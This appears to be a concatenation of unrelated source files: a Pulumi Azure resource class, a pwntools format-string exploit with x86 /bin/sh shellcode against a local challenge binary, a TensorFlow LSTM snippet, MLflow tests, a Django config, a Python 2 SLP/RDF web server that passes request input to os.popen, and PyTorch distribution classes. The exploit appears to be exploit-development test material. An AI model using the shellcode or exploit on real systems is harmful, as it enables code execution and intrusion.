alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:network/latest:DdosProtectionPlan"), pulumi.Alias(type_="azure-nextgen:network/v20180201:DdosProtectionPlan"), pulumi.Alias(type_="azure-nextgen:network/v20180401:DdosProtectionPlan"), pulumi.Alias(type_="azure-nextgen:network/v20180601:DdosProtectionPlan"), pulumi.Alias(type_="azure-nextgen:network/v20180701:DdosProtectionPlan"), pulumi.Alias(type_="azure-nextgen:network/v20180801:DdosProtectionPlan"), pulumi.Alias(type_="azure-nextgen:network/v20181001:DdosProtectionPlan"), pulumi.Alias(type_="azure-nextgen:network/v20181101:DdosProtectionPlan"), pulumi.Alias(type_="azure-nextgen:network/v20181201:DdosProtectionPlan"), pulumi.Alias(type_="azure-nextgen:network/v20190201:DdosProtectionPlan"), pulumi.Alias(type_="azure-nextgen:network/v20190401:DdosProtectionPlan"), pulumi.Alias(type_="azure-nextgen:network/v20190601:DdosProtectionPlan"), pulumi.Alias(type_="azure-nextgen:network/v20190701:DdosProtectionPlan"), pulumi.Alias(type_="azure-nextgen:network/v20190801:DdosProtectionPlan"), pulumi.Alias(type_="azure-nextgen:network/v20190901:DdosProtectionPlan"), pulumi.Alias(type_="azure-nextgen:network/v20191101:DdosProtectionPlan"), pulumi.Alias(type_="azure-nextgen:network/v20191201:DdosProtectionPlan"), pulumi.Alias(type_="azure-nextgen:network/v20200301:DdosProtectionPlan"), pulumi.Alias(type_="azure-nextgen:network/v20200501:DdosProtectionPlan"), pulumi.Alias(type_="azure-nextgen:network/v20200601:DdosProtectionPlan")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(DdosProtectionPlan, __self__).__init__(
'azure-nextgen:network/v20200401:DdosProtectionPlan',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'DdosProtectionPlan':
"""
Get an existing DdosProtectionPlan resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
return DdosProtectionPlan(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def etag(self) -> pulumi.Output[str]:
"""
A unique read-only string that changes whenever the resource is updated.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter
def location(self) -> pulumi.Output[Optional[str]]:
"""
Resource location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
The provisioning state of the DDoS protection plan resource.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="resourceGuid")
def resource_guid(self) -> pulumi.Output[str]:
"""
The resource GUID property of the DDoS protection plan resource. It uniquely identifies the resource, even if the user changes its name or migrate the resource across subscriptions or resource groups.
"""
return pulumi.get(self, "resource_guid")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="virtualNetworks")
def virtual_networks(self) -> pulumi.Output[Sequence['outputs.SubResourceResponse']]:
"""
The list of virtual networks associated with the DDoS protection plan resource. This list is read-only.
"""
return pulumi.get(self, "virtual_networks")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| [
"public@paulstack.co.uk"
] | public@paulstack.co.uk |
a650ff2e726fa3c8a71871ebc3fe44fa460c67d6 | 077a17b286bdd6c427c325f196eb6e16b30c257e | /08_FmtString-unit-tests/10_32/verified-exploit-FsGotShellcode.py | 267c686b65001ace4568decd888bfabf4113bbdb | [] | no_license | KurSh/remenissions_test | 626daf6e923459b44b82521aa4cb944aad0dbced | 9dec8085b62a446f7562adfeccf70f8bfcdbb738 | refs/heads/master | 2023-07-08T20:25:04.823318 | 2020-10-05T06:45:16 | 2020-10-05T06:45:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,583 | py | # +------------------------------------------------+
# | Atack: Format String GOT Shellcode |
# +------------------------------------------------+
#
# For more info checkout: https://github.com/guyinatuxedo/nightmare/tree/master/modules/10-fmt_strings
from pwn import *
import sf
target = process("./chall-test_FmtString-10-x86")
gdb.attach(target)
bof_payload = sf.BufferOverflow(arch=32)
target.recvuntil("Tell me I was never good enough: ")
leak = int(target.recvline().strip(b"\n"), 16)
ret_address = leak + (92)
fs = sf.WriteFmtStr(
arch = 32,
value = -0x36,
address = 0x804b2d8,
offset = 0x4,
printed_bytes = 0x0,
alignment_bytes = 0x0,
value_base = ret_address,
address_base = 0)
payload = sf.BufferOverflow(arch=32, start=92)
payload.add_bytes(92, fs.generate_fmt_str())
payload.add_bytes(54, b"\x83\xec\x7f\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\x04\x05\x04\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80")
target.sendline(payload.generate_payload())
target.interactive()
# +------------------------------------------------+
# | Artist: Avenged Sevenfold |
# +------------------------------------------------+
# | Song: Bat Country |
# +------------------------------------------------+
# | Scared but you can follow me |
# | I'm |
# | Too weird to live but much to rare |
# | to die |
# +------------------------------------------------+
| [
"ryancmeinke@gmail.com"
] | ryancmeinke@gmail.com |
93366da9c13ccb209b3b624ab0008ae69ab264fb | 80810054516ddc3fd93e916de4bf7e3e07d871b0 | /1-books/book2_TensorFlow实战Google深度学习框架(第二版)/practice/LSTM_test1.py | cbed959b70b74bac7a7f453e2de3150c42bb2b24 | [] | no_license | TinyHandsome/BookStudy | df9ca668f2dd1b51b1e364c22bc531394a03eeae | 69c9018bb70893f74a44e4df9f3d3e39467de3f6 | refs/heads/master | 2023-09-04T03:06:43.918259 | 2023-09-01T04:27:01 | 2023-09-01T04:27:01 | 184,217,837 | 18 | 17 | null | null | null | null | UTF-8 | Python | false | false | 2,216 | py | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
# coding=utf-8
"""
@author: Li Tian
@contact: 694317828@qq.com
@software: pycharm
@file: LSTM_test1.py
@time: 2018/12/23 13:37
@desc: LSTM测试1
"""
import tensorflow as tf
# 定义一个LSTM结构。再Tensorflow中通过一句简单的命令就可以实现一个完整的LSTM结构。
# LSTM中使用的变量也会在该函数中自动被声明
lstm = tf.nn.rnn_cell.BasicLSTMCell(lstm_hidden_size)
# 将LSTM中的状态初始化为全0数组。BasicLSTMCell类提供了zero_state函数来生成全零的初始状态。state是一个包含两个张量的
# LSTMStateTuple类,其中state.c和state.h分别对应了图中的c状态和h状态。
# 和其他神经网络类似,在优化循环神经网络时,每次也会使用一个batch的训练样本。
# 以下代码中,batch_size给出了一个batch的大小。
state = lstm.zero_state(batch_size, tf.float32)
# 定义损失函数。
loss = 0.0
# 虽然在测试时循环神经网络可以处理任意长度的序列,但是在训练中为了将循环网络展开成前馈神经网络,我们需要知道训练数据的序列长度。
# 在以下代码中,用num_steps来表示这个长度。第9章将介绍使用dynamic_rnn动态处理变长序列的方法。
for i in range(num_steps):
# 在第一个时刻声明LSTM结构中使用的变量,在之后的时刻都需要复用之前定义好的变量。
if i > 0:
tf.get_variable_scope().reuse_variables()
# 每一步处理时间序列中的一个时刻。将当前输入current_input(xt)和前一时刻状态state(ht-1和ct-1)闯入定义的LSTM结构
# 可以得到当前LSTM的输出lstm_output(ht)和更新后的状态state(ht和ct)。lstm_output用于输出给其他层,state用于输出给
# 下一时刻,它们在dropout等方面可以有不同的处理方式。
lstm_output, state = lstm(current_input, state)
# 将当前时刻LSTM结构的输出传入一个全连接层得到最后的输出。
final_output = fully_connected(lstm_output)
# 计算当前时刻输出的损失。
loss += calc_loss(final_output, expected_output)
# 使用类似第4章中介绍的方法训练模型。
| [
"694317828@qq.com"
] | 694317828@qq.com |
25a74194ca6e00f498d76dc01fac448dabd6dcdc | 5d28c38dfdd185875ba0edaf77281e684c81da0c | /tests/projects/backend/test_local.py | 6d2c431abc4dfb26ae7324c1182734a9f5c5ff01 | [
"Apache-2.0"
] | permissive | imrehg/mlflow | 3a68acc1730b3ee6326c1366760d6ddc7e66099c | 5ddfe9a1b48e065540094d83125040d3273c48fa | refs/heads/master | 2022-09-24T05:39:02.767657 | 2022-09-20T00:14:07 | 2022-09-20T00:14:07 | 244,945,486 | 1 | 0 | Apache-2.0 | 2020-03-04T16:11:54 | 2020-03-04T16:11:53 | null | UTF-8 | Python | false | false | 3,187 | py | import os
from unittest import mock
from mlflow.projects.backend.local import _get_docker_artifact_storage_cmd_and_envs
def test_docker_s3_artifact_cmd_and_envs_from_env():
mock_env = {
"AWS_SECRET_ACCESS_KEY": "mock_secret",
"AWS_ACCESS_KEY_ID": "mock_access_key",
"MLFLOW_S3_ENDPOINT_URL": "mock_endpoint",
"MLFLOW_S3_IGNORE_TLS": "false",
}
with mock.patch.dict("os.environ", mock_env), mock.patch(
"posixpath.exists", return_value=False
):
cmds, envs = _get_docker_artifact_storage_cmd_and_envs("s3://mock_bucket")
assert cmds == []
assert envs == mock_env
def test_docker_s3_artifact_cmd_and_envs_from_home():
mock_env = {}
with mock.patch.dict("os.environ", mock_env), mock.patch(
"posixpath.exists", return_value=True
), mock.patch("posixpath.expanduser", return_value="mock_volume"):
cmds, envs = _get_docker_artifact_storage_cmd_and_envs("s3://mock_bucket")
assert cmds == ["-v", "mock_volume:/.aws"]
assert envs == mock_env
def test_docker_wasbs_artifact_cmd_and_envs_from_home():
# pylint: disable=unused-import
from azure.storage.blob import BlobServiceClient
mock_env = {
"AZURE_STORAGE_CONNECTION_STRING": "mock_connection_string",
"AZURE_STORAGE_ACCESS_KEY": "mock_access_key",
}
wasbs_uri = "wasbs://container@account.blob.core.windows.net/some/path"
with mock.patch.dict("os.environ", mock_env), mock.patch(
"azure.storage.blob.BlobServiceClient"
):
cmds, envs = _get_docker_artifact_storage_cmd_and_envs(wasbs_uri)
assert cmds == []
assert envs == mock_env
def test_docker_gcs_artifact_cmd_and_envs_from_home():
mock_env = {
"GOOGLE_APPLICATION_CREDENTIALS": "mock_credentials_path",
}
gs_uri = "gs://mock_bucket"
with mock.patch.dict("os.environ", mock_env, clear=True):
cmds, envs = _get_docker_artifact_storage_cmd_and_envs(gs_uri)
assert cmds == ["-v", "mock_credentials_path:/.gcs"]
assert envs == {"GOOGLE_APPLICATION_CREDENTIALS": "/.gcs"}
def test_docker_hdfs_artifact_cmd_and_envs_from_home():
mock_env = {
"MLFLOW_KERBEROS_TICKET_CACHE": "/mock_ticket_cache",
"MLFLOW_KERBEROS_USER": "mock_krb_user",
"MLFLOW_PYARROW_EXTRA_CONF": "mock_pyarrow_extra_conf",
}
hdfs_uri = "hdfs://host:8020/path"
with mock.patch.dict("os.environ", mock_env, clear=True):
cmds, envs = _get_docker_artifact_storage_cmd_and_envs(hdfs_uri)
assert cmds == ["-v", "/mock_ticket_cache:/mock_ticket_cache"]
assert envs == mock_env
def test_docker_local_artifact_cmd_and_envs():
host_path_expected = os.path.abspath("./mlruns")
container_path_expected = "/mlflow/projects/code/mlruns"
cmds, envs = _get_docker_artifact_storage_cmd_and_envs("file:./mlruns")
assert cmds == ["-v", "{}:{}".format(host_path_expected, container_path_expected)]
assert envs == {}
def test_docker_unknown_uri_artifact_cmd_and_envs():
cmd, envs = _get_docker_artifact_storage_cmd_and_envs("file-plugin://some_path")
assert cmd == []
assert envs == {}
| [
"noreply@github.com"
] | imrehg.noreply@github.com |
ac0ef84ade51397fbee7edd074f3c6ea7195b611 | d700b9ad1e0b7225871b65ce0dafb27fb408c4bc | /students/k3342/laboratory_works/Frolov_Alex/laboratory_work_2/lab2_app/apps.py | 485b93435cb1e8f7116e847859352c160710f558 | [
"MIT"
] | permissive | TonikX/ITMO_ICT_WebProgramming_2020 | a8c573ed467fdf99327777fb3f3bfeee5714667b | ba566c1b3ab04585665c69860b713741906935a0 | refs/heads/master | 2023-01-11T22:10:17.003838 | 2020-10-22T11:22:03 | 2020-10-22T11:22:03 | 248,549,610 | 10 | 71 | MIT | 2023-01-28T14:04:21 | 2020-03-19T16:18:55 | Python | UTF-8 | Python | false | false | 95 | py | from django.apps import AppConfig
class Lab2AppConfig(AppConfig):
name = 'lab2_app'
| [
"noreply@github.com"
] | TonikX.noreply@github.com |
f3a373a6f19c2f0cffafcbdfe7cc7e243c9f42e0 | cac9c211a4eeb55cfd61d8e5c54a1d4082c4de33 | /Experimental/SLP/webslptool.py | 05fc80ef9e7f2def20ce53e4aa4dcd72059c9b6e | [
"BSD-3-Clause"
] | permissive | vchateauneu/survol | 8c8b5db67f81c6400c3e2f4b84b57fb83d69fb1f | 2b5be9d28115f8f9b1dd91bf05449c92bf9a9926 | refs/heads/master | 2020-03-21T09:11:37.765314 | 2018-07-03T20:40:16 | 2018-07-03T20:40:16 | 138,387,051 | 1 | 0 | null | 2018-06-23T09:05:45 | 2018-06-23T09:05:45 | null | UTF-8 | Python | false | false | 8,376 | py | #!/usr/bin/python
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
import CGIHTTPServer
import re
import os
from os import curdir, sep
import cgi
import time
import urllib
import quik
from quik import FileLoader
def PrintTime():
print time.strftime('%X')
PORT_NUMBER = 1234
# Specialised htpp server which parses its input html file and replaces
# templates by SLP values.
class SlpService:
def __init__( self, name, url, rest, label ):
print "Name="+ name + " url=" + url
self.m_name = name
self.m_url = url
self.m_rest = rest
self.m_label = label
# Only the services we want.
def GetSlpServices(filter):
services_list = []
stream = os.popen("slptool findsrvs service:" + filter)
# service:ftp.smallbox://192.168.100.1:21,65535
lbl = 0
for line in stream:
print "Li=" + line
matchObj = re.match( r'service:([^:]*):/?/?([^,]*)(.*)', line, re.M|re.I)
if matchObj:
service = SlpService(
matchObj.group(1) ,
'http' + '://' + matchObj.group(2) ,
matchObj.group(3) ,
'label_' + str(lbl) )
services_list.append( service )
else:
print "No match!!"
lbl = lbl + 1
return services_list
def ProcessSlpTmpl(tmplfile):
service_filter='http.rdf'
services_list = GetSlpServices(service_filter)
# loader = FileLoader('html')
loader = FileLoader('.')
template = loader.load_template(tmplfile)
generated_html = template.render(
{
'filter': service_filter,
'services': services_list
},
loader=loader).encode('utf-8')
outfile = tmplfile + ".htm"
fil = open(outfile,'w')
fil.write(generated_html)
fil.close()
return outfile
def ProcessPython(tmplfile):
selected_services = split("kjhglkjhl")
outfile = tmplfile + ".htm"
fil = open(outfile,'w')
fil.write(generated_html)
fil.close()
return outfile
# fullfile contains something like "svc_merge_rdf_files.py"
# The processing could be explicitely done here.
def CallMerge(fullfile,cgivars,rdf_out_filnam):
rdf_out_filnam = "merge_result.rdf"
# os.remove(rdf_out_filnam)
cgivars_decoded=urllib.unquote(cgivars).decode('utf8')
list_urls = cgivars_decoded.split(';')
separ=' '
argurls=separ.join( list_urls )
command = fullfile + " " + argurls + " -v --output=" + rdf_out_filnam
print "CallMerge=" + command
PrintTime()
rdf_stream = os.popen(command)
PrintTime()
print "CallMerge output:"
for rdf_line in rdf_stream:
print rdf_line
print "\n"
def ReplaceEdgesLabels(inFileName,outFileName):
print "ReplaceEdgesLabels " + inFileName + " " + outFileName
inFil = open(inFileName)
outFil = open(outFileName,'w')
for inLine in inFil:
# For edges
# node19 -> node12 [url="http://primhillcomputers.com/ontologies/memmap" label="memmap"];
tmpLine = re.sub( \
r'(.*) -> ([^ ]*) \[label="<([^"]*)/([^>]*)>"];', \
r'\1 -> \2 [URL="\3/\4", label="\4", fontsize="3" ];', \
inLine)
# r'\1 -> \2 [labelURL="\3/\4" label="\4" fontsize="3" ];', \
# node2 [label="<urn://DuoLnx/proc/12840>", shape=box, fontcolor=blue, style=rounded];
outLine = re.sub( \
r'(.*) \[label="<([^"]*)/([^>]*)>",', \
r'\1 [URL="\2/\3", label="\3",', \
tmpLine)
# r'\1 [labelURL="\2/\3" label="\3" fontsize="3",', \
outFil.write(outLine)
inFil.close()
outFil.close()
# Generate a svg file:
# rdfdot -png -svg result.rdf out.svg
def CallToRdf(rdf_out_filnam,svg_out_filnam):
# TODO: Must wait until the file is finished !!!!!!!!!!!!!!
print "CallToRdf " + rdf_out_filnam + " " + svg_out_filnam
# dot_command = "rdfdot -png -svg " + rdf_out_filnam + " " + svg_out_filnam
dot_filnam_before = rdf_out_filnam + ".before.dot"
# os.remove(dot_filnam_before)
dot_filnam_before_err = rdf_out_filnam + ".before.dot.err"
# os.remove(dot_filnam_before_err)
dot_command = "rdfdot " + rdf_out_filnam + " > " + dot_filnam_before + " 2> " + dot_filnam_before_err
print "ToDot=" + dot_command
PrintTime()
dot_stream = os.popen(dot_command)
print "Dot command output:"
for dot_line in dot_stream:
print dot_line
print "\n"
PrintTime()
dot_filnam_after = rdf_out_filnam + ".dot"
# os.remove(dot_filnam_after)
ReplaceEdgesLabels( dot_filnam_before, dot_filnam_after )
# dot -Kneato -Tsvg merge_result.rdf.dot -o merge_result.svg -Gfontpath=/usr/share/fonts/TTF -Gfontnames=svg -Nfontname=VeraBd.ttf -Efontname=VeraBd.ttf
# dot -Kneato -Tsvg merge_result.rdf.dot -o merge_result.svg -Gfontpath=/usr/share/fonts/TTF -Gfontnames=svg -Nfontname=VeraBd.ttf -Efontname=VeraBd.ttf -v -Goverlap=false
PrintTime()
svg_command = "dot -Kneato -Tsvg " + dot_filnam_after + " -o " + svg_out_filnam \
+ " -Gfontpath=/usr/share/fonts/TTF -Gfontnames=svg" \
+ " -Nfontname=VeraBd.ttf -Efontname=VeraBd.ttf" \
+ " -v -Goverlap=false "
PrintTime()
# http://www.graphviz.org/doc/info/attrs.html#d:fontname
# Several possible options.
# svg_command = "dot -Kfdp -o " + svg_out_filnam + " -Tsvg " + dot_filnam
# svg_command = "dot -Kneato -o " + svg_out_filnam + " -Tsvg " + dot_filnam
# command = "rdfdot -png -svg " + rdf_out_filnam + " " + svg_out_filnam
print "ToSvg=" + svg_command
# os.remove(svg_out_filnam)
svg_stream = os.popen(svg_command)
print "Svg command output:"
for svg_line in svg_stream:
print svg_line
print "\n"
PrintTime()
class myReqHandler(BaseHTTPRequestHandler):
#Handler for the GET requests
def do_GET(self):
if self.path=="/":
self.path="/list_rdf_generators.htm"
fullfile= curdir + sep + self.path
cgivars = ""
print "fullfile=" + fullfile
idx_quest = fullfile.find('?')
print "idx_quest=" + str(idx_quest)
if idx_quest != -1:
cgivars = fullfile[idx_quest + 1:]
fullfile = fullfile[0:idx_quest]
print "fullfile=" + fullfile
print "cgivars=" + cgivars
if fullfile.endswith(".tmpl.htm"):
print "Template replacement"
fullfile = ProcessSlpTmpl( fullfile )
if fullfile.endswith(".htm"):
print "Get path=" + fullfile
mimetype = 'html'
infil = open(fullfile)
self.send_response(200)
self.send_header('Content-type',mimetype)
self.end_headers()
self.wfile.write(infil.read())
infil.close()
return
if fullfile.endswith(".py"):
# TODO: FILE MUST BE A PARAMETER !!!!!!!!!!!!!!!!!!
# For the moment it is OK.
rdf_out_filnam = "merge_result.rdf"
if fullfile.endswith("svc_merge_rdf_files.py"):
CallMerge(fullfile, cgivars, rdf_out_filnam)
mimetype = 'rdf+xml'
infil = open(rdf_out_filnam)
elif fullfile.endswith("svc_rdf_to_svg.py"):
svg_out_filnam = "from_rdf.svg"
CallToRdf(rdf_out_filnam,svg_out_filnam)
# image/svg+xml ??
print "Streaming " + svg_out_filnam
mimetype = 'svg+xml'
infil = open(svg_out_filnam)
else:
print "Should not happen:" + fullfile
self.send_response(200)
self.send_header('Content-type',mimetype)
self.end_headers()
self.wfile.write(infil.read())
infil.close()
# ICI: Envoyer le transformation du RDF en SVG sur une autre frame.
# Apres ca, le resultat peut etre expose avec SLP,
# surtout si on le recalcule de facon periodique.
return
print "Should process the CGI variables"
#Handler for the POST requests
def do_POST(self):
print "Post path=" + self.path
form = cgi.FieldStorage(
fp=self.rfile,
headers=self.headers,
environ={'REQUEST_METHOD':'POST',
'CONTENT_TYPE':self.headers['Content-Type'],
})
#for theKey in form:
# print "Key=%s " % ( theKey )
# print "Key=%s is: %s" % ( theKey, form[theKey].name )
# print "Key=%s is: %s" % ( theKey, form[theKey].value )
self.send_response(200)
self.end_headers()
self.wfile.write("Result\r\n")
for theKey in form:
self.wfile.write( "Key=%s is: %s\r\n" % ( theKey, form[theKey].value ) )
#self.wfile.write( "Key=%s is: %s\r\n" % ( theKey, str(form[theKey]) ) )
#self.wfile.write( "Key=%s \r\n" % ( theKey ) )
return
try:
# Create a web server and define the handler to manage the incoming request
httpServer = HTTPServer(('', PORT_NUMBER), myReqHandler)
print 'Started httpserver on port ' , PORT_NUMBER
# handler.cgi_directories = [""]
# Wait forever for incoming http requests
httpServer.serve_forever()
except KeyboardInterrupt:
print '^C received, shutting down the web server'
httpServer.socket.close()
| [
"remi.chateauneu@gmail.com"
] | remi.chateauneu@gmail.com |
c8d783e36ee0e5587a7cc94fd30c3ed54e15537c | 388e90c9cfdb59b28654d711fe1943aeda7cf3fd | /third_party/rlkit_library/rlkit/torch/distributions.py | f6d52d7e57d6894d213cc26a55d0ef533314bd5d | [
"MIT",
"Apache-2.0"
] | permissive | google-research/DBAP-algorithm | bbb2827de7f00c9efa30e3cde109ff755b4d008a | 545a4e780f9d9d480c96b67e7a8ae590a983db6b | refs/heads/main | 2023-07-05T00:38:47.424870 | 2021-08-09T23:59:10 | 2021-08-09T23:59:10 | 394,473,322 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 14,670 | py | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Add custom distributions in addition to th existing ones
"""
import torch
from torch.distributions import Categorical, OneHotCategorical, kl_divergence
from torch.distributions import Normal as TorchNormal
from torch.distributions import Beta as TorchBeta
from torch.distributions import Distribution as TorchDistribution
from torch.distributions import Bernoulli as TorchBernoulli
from torch.distributions import Independent as TorchIndependent
from torch.distributions.utils import _sum_rightmost
from rlkit.core.eval_util import create_stats_ordered_dict
import rlkit.torch.pytorch_util as ptu
import numpy as np
from collections import OrderedDict
class Distribution(TorchDistribution):
def sample_and_logprob(self):
s = self.sample()
log_p = self.log_prob(s)
return s, log_p
def rsample_and_logprob(self):
s = self.rsample()
log_p = self.log_prob(s)
return s, log_p
def mle_estimate(self):
return self.mean
def get_diagnostics(self):
return {}
class TorchDistributionWrapper(Distribution):
def __init__(self, distribution: TorchDistribution):
self.distribution = distribution
@property
def batch_shape(self):
return self.distribution.batch_shape
@property
def event_shape(self):
return self.distribution.event_shape
@property
def arg_constraints(self):
return self.distribution.arg_constraints
@property
def support(self):
return self.distribution.support
@property
def mean(self):
return self.distribution.mean
@property
def variance(self):
return self.distribution.variance
@property
def stddev(self):
return self.distribution.stddev
def sample(self, sample_size=torch.Size()):
return self.distribution.sample(sample_shape=sample_size)
def rsample(self, sample_size=torch.Size()):
return self.distribution.rsample(sample_shape=sample_size)
def log_prob(self, value):
return self.distribution.log_prob(value)
def cdf(self, value):
return self.distribution.cdf(value)
def icdf(self, value):
return self.distribution.icdf(value)
def enumerate_support(self, expand=True):
return self.distribution.enumerate_support(expand=expand)
def entropy(self):
return self.distribution.entropy()
def perplexity(self):
return self.distribution.perplexity()
def __repr__(self):
return 'Wrapped ' + self.distribution.__repr__()
class Delta(Distribution):
"""A deterministic distribution"""
def __init__(self, value):
self.value = value
def sample(self):
return self.value.detach()
def rsample(self):
return self.value
@property
def mean(self):
return self.value
@property
def variance(self):
return 0
@property
def entropy(self):
return 0
class Bernoulli(Distribution, TorchBernoulli):
def get_diagnostics(self):
stats = OrderedDict()
stats.update(create_stats_ordered_dict(
'probability',
ptu.get_numpy(self.probs),
))
return stats
class Independent(Distribution, TorchIndependent):
def get_diagnostics(self):
return self.base_dist.get_diagnostics()
class Beta(Distribution, TorchBeta):
def get_diagnostics(self):
stats = OrderedDict()
stats.update(create_stats_ordered_dict(
'alpha',
ptu.get_numpy(self.concentration0),
))
stats.update(create_stats_ordered_dict(
'beta',
ptu.get_numpy(self.concentration1),
))
stats.update(create_stats_ordered_dict(
'entropy',
ptu.get_numpy(self.entropy()),
))
return stats
class MultivariateDiagonalNormal(TorchDistributionWrapper):
from torch.distributions import constraints
arg_constraints = {'loc': constraints.real, 'scale': constraints.positive}
def __init__(self, loc, scale_diag, reinterpreted_batch_ndims=1):
dist = Independent(TorchNormal(loc, scale_diag),
reinterpreted_batch_ndims=reinterpreted_batch_ndims)
super().__init__(dist)
def get_diagnostics(self):
stats = OrderedDict()
stats.update(create_stats_ordered_dict(
'mean',
ptu.get_numpy(self.mean),
# exclude_max_min=True,
))
stats.update(create_stats_ordered_dict(
'std',
ptu.get_numpy(self.distribution.stddev),
))
return stats
def __repr__(self):
return self.distribution.base_dist.__repr__()
@torch.distributions.kl.register_kl(TorchDistributionWrapper,
TorchDistributionWrapper)
def _kl_mv_diag_normal_mv_diag_normal(p, q):
return kl_divergence(p.distribution, q.distribution)
# Independent RV KL handling - https://github.com/pytorch/pytorch/issues/13545
@torch.distributions.kl.register_kl(TorchIndependent, TorchIndependent)
def _kl_independent_independent(p, q):
if p.reinterpreted_batch_ndims != q.reinterpreted_batch_ndims:
raise NotImplementedError
result = kl_divergence(p.base_dist, q.base_dist)
return _sum_rightmost(result, p.reinterpreted_batch_ndims)
class GaussianMixture(Distribution):
def __init__(self, normal_means, normal_stds, weights):
self.num_gaussians = weights.shape[1]
self.normal_means = normal_means
self.normal_stds = normal_stds
self.normal = MultivariateDiagonalNormal(normal_means, normal_stds)
self.normals = [MultivariateDiagonalNormal(normal_means[:, :, i], normal_stds[:, :, i]) for i in range(self.num_gaussians)]
self.weights = weights
self.categorical = OneHotCategorical(self.weights[:, :, 0])
def log_prob(self, value, ):
log_p = [self.normals[i].log_prob(value) for i in range(self.num_gaussians)]
log_p = torch.stack(log_p, -1)
log_weights = torch.log(self.weights[:, :, 0])
lp = log_weights + log_p
m = lp.max(dim=1)[0] # log-sum-exp numerical stability trick
log_p_mixture = m + torch.log(torch.exp(lp - m[:, None]).sum(dim=1))
return log_p_mixture
def sample(self):
z = self.normal.sample().detach()
c = self.categorical.sample()[:, :, None]
s = torch.matmul(z, c)
return torch.squeeze(s, 2)
def rsample(self):
z = (
self.normal_means +
self.normal_stds *
MultivariateDiagonalNormal(
ptu.zeros(self.normal_means.size()),
ptu.ones(self.normal_stds.size())
).sample()
)
z.requires_grad_()
c = self.categorical.sample()[:, :, None]
s = torch.matmul(z, c)
return torch.squeeze(s, 2)
def mle_estimate(self):
"""Return the mean of the most likely component.
This often computes the mode of the distribution, but not always.
"""
c = ptu.zeros(self.weights.shape[:2])
ind = torch.argmax(self.weights, dim=1) # [:, 0]
c.scatter_(1, ind, 1)
s = torch.matmul(self.normal_means, c[:, :, None])
return torch.squeeze(s, 2)
def __repr__(self):
s = "GaussianMixture(normal_means=%s, normal_stds=%s, weights=%s)"
return s % (self.normal_means, self.normal_stds, self.weights)
epsilon = 0.001
class GaussianMixtureFull(Distribution):
def __init__(self, normal_means, normal_stds, weights):
self.num_gaussians = weights.shape[-1]
self.normal_means = normal_means
self.normal_stds = normal_stds
self.normal = MultivariateDiagonalNormal(normal_means, normal_stds)
self.normals = [MultivariateDiagonalNormal(normal_means[:, :, i], normal_stds[:, :, i]) for i in range(self.num_gaussians)]
self.weights = (weights + epsilon) / (1 + epsilon * self.num_gaussians)
assert (self.weights > 0).all()
self.categorical = Categorical(self.weights)
def log_prob(self, value, ):
log_p = [self.normals[i].log_prob(value) for i in range(self.num_gaussians)]
log_p = torch.stack(log_p, -1)
log_weights = torch.log(self.weights)
lp = log_weights + log_p
m = lp.max(dim=2, keepdim=True)[0] # log-sum-exp numerical stability trick
log_p_mixture = m + torch.log(torch.exp(lp - m).sum(dim=2, keepdim=True))
raise NotImplementedError("from Vitchyr: idk what the point is of "
"this class, so I didn't both updating "
"this, but log_prob should return something "
"of shape [batch_size] and not [batch_size, "
"1] to be in accordance with the "
"torch.distributions.Distribution "
"interface.")
return torch.squeeze(log_p_mixture, 2)
def sample(self):
z = self.normal.sample().detach()
c = self.categorical.sample()[:, :, None]
s = torch.gather(z, dim=2, index=c)
return s[:, :, 0]
def rsample(self):
z = (
self.normal_means +
self.normal_stds *
MultivariateDiagonalNormal(
ptu.zeros(self.normal_means.size()),
ptu.ones(self.normal_stds.size())
).sample()
)
z.requires_grad_()
c = self.categorical.sample()[:, :, None]
s = torch.gather(z, dim=2, index=c)
return s[:, :, 0]
def mle_estimate(self):
"""Return the mean of the most likely component.
This often computes the mode of the distribution, but not always.
"""
ind = torch.argmax(self.weights, dim=2)[:, :, None]
means = torch.gather(self.normal_means, dim=2, index=ind)
return torch.squeeze(means, 2)
def __repr__(self):
s = "GaussianMixture(normal_means=%s, normal_stds=%s, weights=%s)"
return s % (self.normal_means, self.normal_stds, self.weights)
class TanhNormal(Distribution):
"""
Represent distribution of X where
X ~ tanh(Z)
Z ~ N(mean, std)
Note: this is not very numerically stable.
"""
